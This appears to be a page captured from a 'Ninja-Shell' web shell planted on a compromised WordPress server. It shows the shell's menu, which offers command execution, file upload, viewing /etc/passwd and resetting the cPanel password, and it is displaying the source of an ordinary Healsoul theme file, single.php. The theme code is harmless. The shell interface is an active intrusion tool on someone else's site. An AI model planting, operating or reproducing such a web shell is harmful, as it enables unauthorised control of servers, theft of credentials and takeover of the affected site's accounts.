{Ninja-Shell}
Home
Info
Upload
Command
View /etc/passwd
cPanel Reset Password
Filename: /var/www//1stopsheba///wp-content/themes/healsoul/single.php
<?php /** * The template for displaying all single posts. * * @link https://developer.wordpress.org/themes/basics/template-hierarchy/#single-post * * @package Healsoul * @since 1.0 */ get_header(); ?> <?php Healsoul_Templates::title_bar(); ?> <div id="page-content" class="page-content"> <div class="container"> <div class="row"> <?php Healsoul_Templates::render_sidebar( 'left' ); ?> <div class="page-main-content"> <?php while ( have_posts() ) : the_post(); get_template_part( 'components/content', 'single' ); if ( Healsoul::setting( 'single_post_pagination_enable' ) === '1' ) { Healsoul_Templates::post_nav_links(); } if ( Healsoul::setting( 'single_post_related_enable' ) ) { get_template_part( 'components/content', 'single-related-posts' ); } // If comments are open or we have at least one comment, load up the comment template. if ( Healsoul::setting( 'single_post_comment_enable' ) === '1' && ( comments_open() || get_comments_number() ) ) : comments_template(); endif; if ( Healsoul::setting( 'single_post_comment_enable' ) === '1' ) { get_template_part( 'components/comment-form' ); } endwhile; // End of the loop. ?> </div> <?php Healsoul_Templates::render_sidebar( 'right' ); ?> </div> </div> </div> <?php get_footer();
./Ninja\.